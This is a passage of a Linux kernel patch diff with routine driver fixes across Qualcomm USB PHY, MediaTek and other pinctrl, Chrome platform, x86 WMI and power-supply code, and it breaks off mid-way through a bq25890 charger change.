+@@ -1754,13 +1717,7 @@ static const struct qmp_phy_cfg qmp_v3_usb3_uniphy_cfg = {
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= qmp_v3_usb3phy_regs_layout,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
+ static const struct qmp_phy_cfg msm8998_usb3phy_cfg = {
+@@ -1781,10 +1738,6 @@ static const struct qmp_phy_cfg msm8998_usb3phy_cfg = {
+ 	.vreg_list              = qmp_phy_vreg_l,
+ 	.num_vregs              = ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs                   = qmp_v3_usb3phy_regs_layout,
+-
+-	.start_ctrl             = SERDES_START | PCS_START,
+-	.pwrdn_ctrl             = SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+ };
+ 
+ static const struct qmp_phy_cfg sm8150_usb3phy_cfg = {
+@@ -1809,15 +1762,7 @@ static const struct qmp_phy_cfg sm8150_usb3phy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x300,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+-
+ 	.has_phy_dp_com_ctrl	= true,
+ };
+ 
+@@ -1843,13 +1788,7 @@ static const struct qmp_phy_cfg sm8150_usb3_uniphy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x600,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
+ static const struct qmp_phy_cfg sm8250_usb3phy_cfg = {
+@@ -1874,14 +1813,7 @@ static const struct qmp_phy_cfg sm8250_usb3phy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x300,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+-
+ 	.has_phy_dp_com_ctrl	= true,
+ };
+ 
+@@ -1907,13 +1839,7 @@ static const struct qmp_phy_cfg sm8250_usb3_uniphy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x600,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
+ static const struct qmp_phy_cfg sdx55_usb3_uniphy_cfg = {
+@@ -1938,13 +1864,7 @@ static const struct qmp_phy_cfg sdx55_usb3_uniphy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x600,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
+ static const struct qmp_phy_cfg sdx65_usb3_uniphy_cfg = {
+@@ -1969,13 +1889,7 @@ static const struct qmp_phy_cfg sdx65_usb3_uniphy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x1000,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
+ static const struct qmp_phy_cfg sm8350_usb3phy_cfg = {
+@@ -2000,14 +1914,7 @@ static const struct qmp_phy_cfg sm8350_usb3phy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x300,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+-
+ 	.has_phy_dp_com_ctrl	= true,
+ };
+ 
+@@ -2033,13 +1940,7 @@ static const struct qmp_phy_cfg sm8350_usb3_uniphy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x1000,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
+ static const struct qmp_phy_cfg qcm2290_usb3phy_cfg = {
+@@ -2060,10 +1961,6 @@ static const struct qmp_phy_cfg qcm2290_usb3phy_cfg = {
+ 	.vreg_list		= qmp_phy_vreg_l,
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= qcm2290_usb3phy_regs_layout,
+-
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+ };
+ 
+ static void qmp_usb_configure_lane(void __iomem *base,
+@@ -2164,13 +2061,7 @@ static int qmp_usb_init(struct phy *phy)
+ 		qphy_clrbits(dp_com, QPHY_V3_DP_COM_SW_RESET, SW_RESET);
+ 	}
+ 
+-	if (cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL])
+-		qphy_setbits(pcs,
+-			     cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL],
+-			     cfg->pwrdn_ctrl);
+-	else
+-		qphy_setbits(pcs, QPHY_V2_PCS_POWER_DOWN_CONTROL,
+-			     cfg->pwrdn_ctrl);
++	qphy_setbits(pcs, cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL], SW_PWRDN);
+ 
+ 	return 0;
+ 
+@@ -2206,7 +2097,7 @@ static int qmp_usb_power_on(struct phy *phy)
+ 	void __iomem *rx = qphy->rx;
+ 	void __iomem *pcs = qphy->pcs;
+ 	void __iomem *status;
+-	unsigned int mask, val, ready;
++	unsigned int val;
+ 	int ret;
+ 
+ 	qmp_usb_serdes_init(qphy);
+@@ -2236,19 +2127,16 @@ static int qmp_usb_power_on(struct phy *phy)
+ 	qmp_usb_configure(pcs, cfg->regs, cfg->pcs_tbl, cfg->pcs_tbl_num);
+ 
+ 	if (cfg->has_pwrdn_delay)
+-		usleep_range(cfg->pwrdn_delay_min, cfg->pwrdn_delay_max);
++		usleep_range(10, 20);
+ 
+ 	/* Pull PHY out of reset state */
+ 	qphy_clrbits(pcs, cfg->regs[QPHY_SW_RESET], SW_RESET);
+ 
+ 	/* start SerDes and Phy-Coding-Sublayer */
+-	qphy_setbits(pcs, cfg->regs[QPHY_START_CTRL], cfg->start_ctrl);
++	qphy_setbits(pcs, cfg->regs[QPHY_START_CTRL], SERDES_START | PCS_START);
+ 
+ 	status = pcs + cfg->regs[QPHY_PCS_STATUS];
+-	mask = cfg->phy_status;
+-	ready = 0;
+-
+-	ret = readl_poll_timeout(status, val, (val & mask) == ready, 10,
++	ret = readl_poll_timeout(status, val, !(val & PHYSTATUS), 10,
+ 				 PHY_INIT_COMPLETE_TIMEOUT);
+ 	if (ret) {
+ 		dev_err(qmp->dev, "phy initialization timed-out\n");
+@@ -2274,16 +2162,12 @@ static int qmp_usb_power_off(struct phy *phy)
+ 	qphy_setbits(qphy->pcs, cfg->regs[QPHY_SW_RESET], SW_RESET);
+ 
+ 	/* stop SerDes and Phy-Coding-Sublayer */
+-	qphy_clrbits(qphy->pcs, cfg->regs[QPHY_START_CTRL], cfg->start_ctrl);
++	qphy_clrbits(qphy->pcs, cfg->regs[QPHY_START_CTRL],
++			SERDES_START | PCS_START);
+ 
+ 	/* Put PHY into POWER DOWN state: active low */
+-	if (cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL]) {
+-		qphy_clrbits(qphy->pcs, cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL],
+-			     cfg->pwrdn_ctrl);
+-	} else {
+-		qphy_clrbits(qphy->pcs, QPHY_V2_PCS_POWER_DOWN_CONTROL,
+-				cfg->pwrdn_ctrl);
+-	}
++	qphy_clrbits(qphy->pcs, cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL],
++			SW_PWRDN);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp.h b/drivers/phy/qualcomm/phy-qcom-qmp.h
+index 26274e3c0cf95..29a48f0436d2a 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp.h
++++ b/drivers/phy/qualcomm/phy-qcom-qmp.h
+@@ -38,6 +38,7 @@
+ #include "phy-qcom-qmp-pcs-pcie-v4_20.h"
+ 
+ #include "phy-qcom-qmp-pcs-v5.h"
++#include "phy-qcom-qmp-pcs-v5_20.h"
+ #include "phy-qcom-qmp-pcs-pcie-v5.h"
+ #include "phy-qcom-qmp-pcs-usb-v5.h"
+ #include "phy-qcom-qmp-pcs-ufs-v5.h"
+diff --git a/drivers/pinctrl/mediatek/pinctrl-mt7986.c b/drivers/pinctrl/mediatek/pinctrl-mt7986.c
+index 50cb736f9f116..b587299697481 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-mt7986.c
++++ b/drivers/pinctrl/mediatek/pinctrl-mt7986.c
+@@ -316,10 +316,10 @@ static const struct mtk_pin_field_calc mt7986_pin_pupd_range[] = {
+ 	PIN_FIELD_BASE(38, 38, IOCFG_LT_BASE, 0x30, 0x10, 9, 1),
+ 	PIN_FIELD_BASE(39, 40, IOCFG_RB_BASE, 0x60, 0x10, 18, 1),
+ 	PIN_FIELD_BASE(41, 41, IOCFG_RB_BASE, 0x60, 0x10, 12, 1),
+-	PIN_FIELD_BASE(42, 43, IOCFG_RB_BASE, 0x60, 0x10, 22, 1),
+-	PIN_FIELD_BASE(44, 45, IOCFG_RB_BASE, 0x60, 0x10, 20, 1),
+-	PIN_FIELD_BASE(46, 47, IOCFG_RB_BASE, 0x60, 0x10, 26, 1),
+-	PIN_FIELD_BASE(48, 49, IOCFG_RB_BASE, 0x60, 0x10, 24, 1),
++	PIN_FIELD_BASE(42, 43, IOCFG_RB_BASE, 0x60, 0x10, 23, 1),
++	PIN_FIELD_BASE(44, 45, IOCFG_RB_BASE, 0x60, 0x10, 21, 1),
++	PIN_FIELD_BASE(46, 47, IOCFG_RB_BASE, 0x60, 0x10, 27, 1),
++	PIN_FIELD_BASE(48, 49, IOCFG_RB_BASE, 0x60, 0x10, 25, 1),
+ 	PIN_FIELD_BASE(50, 57, IOCFG_RT_BASE, 0x40, 0x10, 2, 1),
+ 	PIN_FIELD_BASE(58, 58, IOCFG_RT_BASE, 0x40, 0x10, 1, 1),
+ 	PIN_FIELD_BASE(59, 59, IOCFG_RT_BASE, 0x40, 0x10, 0, 1),
+@@ -354,10 +354,10 @@ static const struct mtk_pin_field_calc mt7986_pin_r0_range[] = {
+ 	PIN_FIELD_BASE(38, 38, IOCFG_LT_BASE, 0x40, 0x10, 9, 1),
+ 	PIN_FIELD_BASE(39, 40, IOCFG_RB_BASE, 0x70, 0x10, 18, 1),
+ 	PIN_FIELD_BASE(41, 41, IOCFG_RB_BASE, 0x70, 0x10, 12, 1),
+-	PIN_FIELD_BASE(42, 43, IOCFG_RB_BASE, 0x70, 0x10, 22, 1),
+-	PIN_FIELD_BASE(44, 45, IOCFG_RB_BASE, 0x70, 0x10, 20, 1),
+-	PIN_FIELD_BASE(46, 47, IOCFG_RB_BASE, 0x70, 0x10, 26, 1),
+-	PIN_FIELD_BASE(48, 49, IOCFG_RB_BASE, 0x70, 0x10, 24, 1),
++	PIN_FIELD_BASE(42, 43, IOCFG_RB_BASE, 0x70, 0x10, 23, 1),
++	PIN_FIELD_BASE(44, 45, IOCFG_RB_BASE, 0x70, 0x10, 21, 1),
++	PIN_FIELD_BASE(46, 47, IOCFG_RB_BASE, 0x70, 0x10, 27, 1),
++	PIN_FIELD_BASE(48, 49, IOCFG_RB_BASE, 0x70, 0x10, 25, 1),
+ 	PIN_FIELD_BASE(50, 57, IOCFG_RT_BASE, 0x50, 0x10, 2, 1),
+ 	PIN_FIELD_BASE(58, 58, IOCFG_RT_BASE, 0x50, 0x10, 1, 1),
+ 	PIN_FIELD_BASE(59, 59, IOCFG_RT_BASE, 0x50, 0x10, 0, 1),
+@@ -392,10 +392,10 @@ static const struct mtk_pin_field_calc mt7986_pin_r1_range[] = {
+ 	PIN_FIELD_BASE(38, 38, IOCFG_LT_BASE, 0x50, 0x10, 9, 1),
+ 	PIN_FIELD_BASE(39, 40, IOCFG_RB_BASE, 0x80, 0x10, 18, 1),
+ 	PIN_FIELD_BASE(41, 41, IOCFG_RB_BASE, 0x80, 0x10, 12, 1),
+-	PIN_FIELD_BASE(42, 43, IOCFG_RB_BASE, 0x80, 0x10, 22, 1),
+-	PIN_FIELD_BASE(44, 45, IOCFG_RB_BASE, 0x80, 0x10, 20, 1),
+-	PIN_FIELD_BASE(46, 47, IOCFG_RB_BASE, 0x80, 0x10, 26, 1),
+-	PIN_FIELD_BASE(48, 49, IOCFG_RB_BASE, 0x80, 0x10, 24, 1),
++	PIN_FIELD_BASE(42, 43, IOCFG_RB_BASE, 0x80, 0x10, 23, 1),
++	PIN_FIELD_BASE(44, 45, IOCFG_RB_BASE, 0x80, 0x10, 21, 1),
++	PIN_FIELD_BASE(46, 47, IOCFG_RB_BASE, 0x80, 0x10, 27, 1),
++	PIN_FIELD_BASE(48, 49, IOCFG_RB_BASE, 0x80, 0x10, 25, 1),
+ 	PIN_FIELD_BASE(50, 57, IOCFG_RT_BASE, 0x60, 0x10, 2, 1),
+ 	PIN_FIELD_BASE(58, 58, IOCFG_RT_BASE, 0x60, 0x10, 1, 1),
+ 	PIN_FIELD_BASE(59, 59, IOCFG_RT_BASE, 0x60, 0x10, 0, 1),
+diff --git a/drivers/pinctrl/pinconf-generic.c b/drivers/pinctrl/pinconf-generic.c
+index 415d1df8f46a5..365c4b0ca4654 100644
+--- a/drivers/pinctrl/pinconf-generic.c
++++ b/drivers/pinctrl/pinconf-generic.c
+@@ -395,8 +395,10 @@ int pinconf_generic_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	for_each_available_child_of_node(np_config, np) {
+ 		ret = pinconf_generic_dt_subnode_to_map(pctldev, np, map,
+ 					&reserved_maps, num_maps, type);
+-		if (ret < 0)
++		if (ret < 0) {
++			of_node_put(np);
+ 			goto exit;
++		}
+ 	}
+ 	return 0;
+ 
+diff --git a/drivers/pinctrl/pinctrl-k210.c b/drivers/pinctrl/pinctrl-k210.c
+index ecab6bf63dc6d..ad4db99094a79 100644
+--- a/drivers/pinctrl/pinctrl-k210.c
++++ b/drivers/pinctrl/pinctrl-k210.c
+@@ -862,8 +862,10 @@ static int k210_pinctrl_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	for_each_available_child_of_node(np_config, np) {
+ 		ret = k210_pinctrl_dt_subnode_to_map(pctldev, np, map,
+ 						     &reserved_maps, num_maps);
+-		if (ret < 0)
++		if (ret < 0) {
++			of_node_put(np);
+ 			goto err;
++		}
+ 	}
+ 	return 0;
+ 
+diff --git a/drivers/pinctrl/pinctrl-ocelot.c b/drivers/pinctrl/pinctrl-ocelot.c
+index 687aaa6015555..3d5995cbcb782 100644
+--- a/drivers/pinctrl/pinctrl-ocelot.c
++++ b/drivers/pinctrl/pinctrl-ocelot.c
+@@ -2047,6 +2047,11 @@ static struct regmap *ocelot_pinctrl_create_pincfg(struct platform_device *pdev,
+ 	return devm_regmap_init_mmio(&pdev->dev, base, &regmap_config);
+ }
+ 
++static void ocelot_destroy_workqueue(void *data)
++{
++	destroy_workqueue(data);
++}
++
+ static int ocelot_pinctrl_probe(struct platform_device *pdev)
+ {
+ 	const struct ocelot_match_data *data;
+@@ -2078,6 +2083,11 @@ static int ocelot_pinctrl_probe(struct platform_device *pdev)
+ 	if (!info->wq)
+ 		return -ENOMEM;
+ 
++	ret = devm_add_action_or_reset(dev, ocelot_destroy_workqueue,
++				       info->wq);
++	if (ret)
++		return ret;
++
+ 	info->pincfg_data = &data->pincfg_data;
+ 
+ 	reset = devm_reset_control_get_optional_shared(dev, "switch");
+@@ -2119,15 +2129,6 @@ static int ocelot_pinctrl_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int ocelot_pinctrl_remove(struct platform_device *pdev)
+-{
+-	struct ocelot_pinctrl *info = platform_get_drvdata(pdev);
+-
+-	destroy_workqueue(info->wq);
+-
+-	return 0;
+-}
+-
+ static struct platform_driver ocelot_pinctrl_driver = {
+ 	.driver = {
+ 		.name = "pinctrl-ocelot",
+@@ -2135,7 +2136,6 @@ static struct platform_driver ocelot_pinctrl_driver = {
+ 		.suppress_bind_attrs = true,
+ 	},
+ 	.probe = ocelot_pinctrl_probe,
+-	.remove = ocelot_pinctrl_remove,
+ };
+ module_platform_driver(ocelot_pinctrl_driver);
+ 
+diff --git a/drivers/pinctrl/pinctrl-thunderbay.c b/drivers/pinctrl/pinctrl-thunderbay.c
+index 9328b17485cf0..590bbbf619afc 100644
+--- a/drivers/pinctrl/pinctrl-thunderbay.c
++++ b/drivers/pinctrl/pinctrl-thunderbay.c
+@@ -808,7 +808,7 @@ static int thunderbay_add_functions(struct thunderbay_pinctrl *tpc, struct funct
+ 					    funcs[i].num_group_names,
+ 					    funcs[i].data);
+ 	}
+-	kfree(funcs);
++
+ 	return 0;
+ }
+ 
+@@ -817,6 +817,7 @@ static int thunderbay_build_functions(struct thunderbay_pinctrl *tpc)
+ 	struct function_desc *thunderbay_funcs;
+ 	void *ptr;
+ 	int pin;
++	int ret;
+ 
+ 	/*
+ 	 * Allocate maximum possible number of functions. Assume every pin
+@@ -860,7 +861,10 @@ static int thunderbay_build_functions(struct thunderbay_pinctrl *tpc)
+ 		return -ENOMEM;
+ 
+ 	thunderbay_funcs = ptr;
+-	return thunderbay_add_functions(tpc, thunderbay_funcs);
++	ret = thunderbay_add_functions(tpc, thunderbay_funcs);
++
++	kfree(thunderbay_funcs);
++	return ret;
+ }
+ 
+ static int thunderbay_pinconf_set_tristate(struct thunderbay_pinctrl *tpc,
+diff --git a/drivers/platform/chrome/cros_ec_typec.c b/drivers/platform/chrome/cros_ec_typec.c
+index 2a7ff14dc37e9..59de4ce01faba 100644
+--- a/drivers/platform/chrome/cros_ec_typec.c
++++ b/drivers/platform/chrome/cros_ec_typec.c
+@@ -173,10 +173,13 @@ static int cros_typec_get_switch_handles(struct cros_typec_port *port,
+ 
+ role_sw_err:
+ 	typec_switch_put(port->ori_sw);
++	port->ori_sw = NULL;
+ ori_sw_err:
+ 	typec_retimer_put(port->retimer);
++	port->retimer = NULL;
+ retimer_sw_err:
+ 	typec_mux_put(port->mux);
++	port->mux = NULL;
+ mux_err:
+ 	return -ENODEV;
+ }
+diff --git a/drivers/platform/chrome/cros_usbpd_notify.c b/drivers/platform/chrome/cros_usbpd_notify.c
+index 4b5a81c9dc6da..10670b6588e3e 100644
+--- a/drivers/platform/chrome/cros_usbpd_notify.c
++++ b/drivers/platform/chrome/cros_usbpd_notify.c
+@@ -239,7 +239,11 @@ static int __init cros_usbpd_notify_init(void)
+ 		return ret;
+ 
+ #ifdef CONFIG_ACPI
+-	platform_driver_register(&cros_usbpd_notify_acpi_driver);
++	ret = platform_driver_register(&cros_usbpd_notify_acpi_driver);
++	if (ret) {
++		platform_driver_unregister(&cros_usbpd_notify_plat_driver);
++		return ret;
++	}
+ #endif
+ 	return 0;
+ }
+diff --git a/drivers/platform/mellanox/mlxbf-pmc.c b/drivers/platform/mellanox/mlxbf-pmc.c
+index 65b4a819f1bdf..c2c9b0d3244cb 100644
+--- a/drivers/platform/mellanox/mlxbf-pmc.c
++++ b/drivers/platform/mellanox/mlxbf-pmc.c
+@@ -358,7 +358,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_hnfnet_events[] = {
+ 	{ 0x32, "DDN_DIAG_W_INGRESS" },
+ 	{ 0x33, "DDN_DIAG_C_INGRESS" },
+ 	{ 0x34, "DDN_DIAG_CORE_SENT" },
+-	{ 0x35, "NDN_DIAG_S_OUT_OF_CRED" },
++	{ 0x35, "NDN_DIAG_N_OUT_OF_CRED" },
+ 	{ 0x36, "NDN_DIAG_S_OUT_OF_CRED" },
+ 	{ 0x37, "NDN_DIAG_E_OUT_OF_CRED" },
+ 	{ 0x38, "NDN_DIAG_W_OUT_OF_CRED" },
+diff --git a/drivers/platform/x86/huawei-wmi.c b/drivers/platform/x86/huawei-wmi.c
+index 5873c2663a65b..b85050e4a0d65 100644
+--- a/drivers/platform/x86/huawei-wmi.c
++++ b/drivers/platform/x86/huawei-wmi.c
+@@ -760,6 +760,9 @@ static int huawei_wmi_input_setup(struct device *dev,
+ 		const char *guid,
+ 		struct input_dev **idev)
+ {
++	acpi_status status;
++	int err;
++
+ 	*idev = devm_input_allocate_device(dev);
+ 	if (!*idev)
+ 		return -ENOMEM;
+@@ -769,10 +772,19 @@ static int huawei_wmi_input_setup(struct device *dev,
+ 	(*idev)->id.bustype = BUS_HOST;
+ 	(*idev)->dev.parent = dev;
+ 
+-	return sparse_keymap_setup(*idev, huawei_wmi_keymap, NULL) ||
+-		input_register_device(*idev) ||
+-		wmi_install_notify_handler(guid, huawei_wmi_input_notify,
+-				*idev);
++	err = sparse_keymap_setup(*idev, huawei_wmi_keymap, NULL);
++	if (err)
++		return err;
++
++	err = input_register_device(*idev);
++	if (err)
++		return err;
++
++	status = wmi_install_notify_handler(guid, huawei_wmi_input_notify, *idev);
++	if (ACPI_FAILURE(status))
++		return -EIO;
++
++	return 0;
+ }
+ 
+ static void huawei_wmi_input_exit(struct device *dev, const char *guid)
+diff --git a/drivers/platform/x86/intel/int3472/clk_and_regulator.c b/drivers/platform/x86/intel/int3472/clk_and_regulator.c
+index 1cf958983e868..b2342b3d78c72 100644
+--- a/drivers/platform/x86/intel/int3472/clk_and_regulator.c
++++ b/drivers/platform/x86/intel/int3472/clk_and_regulator.c
+@@ -185,7 +185,8 @@ int skl_int3472_register_regulator(struct int3472_discrete_device *int3472,
+ 	cfg.init_data = &init_data;
+ 	cfg.ena_gpiod = int3472->regulator.gpio;
+ 
+-	int3472->regulator.rdev = regulator_register(&int3472->regulator.rdesc,
++	int3472->regulator.rdev = regulator_register(int3472->dev,
++						     &int3472->regulator.rdesc,
+ 						     &cfg);
+ 	if (IS_ERR(int3472->regulator.rdev)) {
+ 		ret = PTR_ERR(int3472->regulator.rdev);
+diff --git a/drivers/platform/x86/intel_scu_ipc.c b/drivers/platform/x86/intel_scu_ipc.c
+index 7cc9089d1e14f..e7a3e34028178 100644
+--- a/drivers/platform/x86/intel_scu_ipc.c
++++ b/drivers/platform/x86/intel_scu_ipc.c
+@@ -583,7 +583,6 @@ __intel_scu_ipc_register(struct device *parent,
+ 	scu->dev.parent = parent;
+ 	scu->dev.class = &intel_scu_ipc_class;
+ 	scu->dev.release = intel_scu_ipc_release;
+-	dev_set_name(&scu->dev, "intel_scu_ipc");
+ 
+ 	if (!request_mem_region(scu_data->mem.start, resource_size(&scu_data->mem),
+ 				"intel_scu_ipc")) {
+@@ -612,6 +611,7 @@ __intel_scu_ipc_register(struct device *parent,
+ 	 * After this point intel_scu_ipc_release() takes care of
+ 	 * releasing the SCU IPC resources once refcount drops to zero.
+ 	 */
++	dev_set_name(&scu->dev, "intel_scu_ipc");
+ 	err = device_register(&scu->dev);
+ 	if (err) {
+ 		put_device(&scu->dev);
+diff --git a/drivers/platform/x86/mxm-wmi.c b/drivers/platform/x86/mxm-wmi.c
+index 9a19fbd2f7341..9a457956025a5 100644
+--- a/drivers/platform/x86/mxm-wmi.c
++++ b/drivers/platform/x86/mxm-wmi.c
+@@ -35,13 +35,11 @@ int mxm_wmi_call_mxds(int adapter)
+ 		.xarg = 1,
+ 	};
+ 	struct acpi_buffer input = { (acpi_size)sizeof(args), &args };
+-	struct acpi_buffer output = { ACPI_ALLOCATE_BUFFER, NULL };
+ 	acpi_status status;
+ 
+ 	printk("calling mux switch %d\n", adapter);
+ 
+-	status = wmi_evaluate_method(MXM_WMMX_GUID, 0x0, adapter, &input,
+-				     &output);
++	status = wmi_evaluate_method(MXM_WMMX_GUID, 0x0, adapter, &input, NULL);
+ 
+ 	if (ACPI_FAILURE(status))
+ 		return status;
+@@ -60,13 +58,11 @@ int mxm_wmi_call_mxmx(int adapter)
+ 		.xarg = 1,
+ 	};
+ 	struct acpi_buffer input = { (acpi_size)sizeof(args), &args };
+-	struct acpi_buffer output = { ACPI_ALLOCATE_BUFFER, NULL };
+ 	acpi_status status;
+ 
+ 	printk("calling mux switch %d\n", adapter);
+ 
+-	status = wmi_evaluate_method(MXM_WMMX_GUID, 0x0, adapter, &input,
+-				     &output);
++	status = wmi_evaluate_method(MXM_WMMX_GUID, 0x0, adapter, &input, NULL);
+ 
+ 	if (ACPI_FAILURE(status))
+ 		return status;
+diff --git a/drivers/pnp/core.c b/drivers/pnp/core.c
+index 4df5aa6a309c3..6a60c5d83383b 100644
+--- a/drivers/pnp/core.c
++++ b/drivers/pnp/core.c
+@@ -148,14 +148,14 @@ struct pnp_dev *pnp_alloc_dev(struct pnp_protocol *protocol, int id,
+ 	dev->dev.coherent_dma_mask = dev->dma_mask;
+ 	dev->dev.release = &pnp_release_device;
+ 
+-	dev_set_name(&dev->dev, "%02x:%02x", dev->protocol->number, dev->number);
+-
+ 	dev_id = pnp_add_id(dev, pnpid);
+ 	if (!dev_id) {
+ 		kfree(dev);
+ 		return NULL;
+ 	}
+ 
++	dev_set_name(&dev->dev, "%02x:%02x", dev->protocol->number, dev->number);
++
+ 	return dev;
+ }
+ 
+diff --git a/drivers/power/supply/ab8500_charger.c b/drivers/power/supply/ab8500_charger.c
+index c19c50442761d..58757a5799f8b 100644
+--- a/drivers/power/supply/ab8500_charger.c
++++ b/drivers/power/supply/ab8500_charger.c
+@@ -3719,7 +3719,14 @@ static int __init ab8500_charger_init(void)
+ 	if (ret)
+ 		return ret;
+ 
+-	return platform_driver_register(&ab8500_charger_driver);
++	ret = platform_driver_register(&ab8500_charger_driver);
++	if (ret) {
++		platform_unregister_drivers(ab8500_charger_component_drivers,
++				ARRAY_SIZE(ab8500_charger_component_drivers));
++		return ret;
++	}
++
++	return 0;
+ }
+ 
+ static void __exit ab8500_charger_exit(void)
+diff --git a/drivers/power/supply/bq25890_charger.c b/drivers/power/supply/bq25890_charger.c
+index 6020b58c641d2..0e15302b8df22 100644
+--- a/drivers/power/supply/bq25890_charger.c
++++ b/drivers/power/supply/bq25890_charger.c
+@@ -1049,6 +1049,36 @@ static const struct regulator_desc bq25890_vbus_desc = {
+ 	.fixed_uV = 5000000,
+ 	.n_voltages = 1,
+ };
++
++static int bq25890_register_regulator(struct bq25890_device *bq)
++{
++	struct bq25890_platform_data *pdata = dev_get_platdata(bq->dev);
++	struct regulator_config cfg = {
++		.dev = bq->dev,
++		.driver_data = bq,
++	};
++	struct regulator_dev *reg;
++
++	if (!IS_ERR_OR_NULL(bq->usb_phy))
++		return 0;
++
++	if (pdata)
++		cfg.init_data = pdata->regulator_init_data;
++
++	reg = devm_regulator_register(bq->dev, &bq25890_vbus_desc, &cfg);
++	if (IS_ERR(reg)) {
++		return dev_err_probe(bq->dev, PTR_ERR(reg),
++				     "registering vbus regulator");
++	}
++
++	return 0;
++}
++#else
++static inline int
++bq25890_register_regulator(struct bq25890_device *bq)
++{
++	return 0;
++}
+ #endif
+ 
+ static int bq25890_get_chip_version(struct bq25890_device *bq)
+@@ -1189,8 +1219,14 @@ static int bq25890_fw_probe(struct bq25890_device *bq)
+ 	return 0;
+ }
+ 
+-static int bq25890_probe(struct i2c_client *client,
+-			 const struct i2c_device_id *id)
++static void bq25890_non_devm_cleanup(void *data)
++{
++	struct bq25890_device *bq = data;
++
++	cancel_delayed_work_sync(&bq->pump_express_work);
++}
++
++static int bq25890_probe(struct i2c_client *client)
+ {
+ 	struct device *dev = &client->dev;
+ 	struct bq25890_device *bq;
+@@ -1244,27 +1280,24 @@ static int bq25890_probe(struct i2c_client *client,
+ 
+ 	/* OTG reporting */
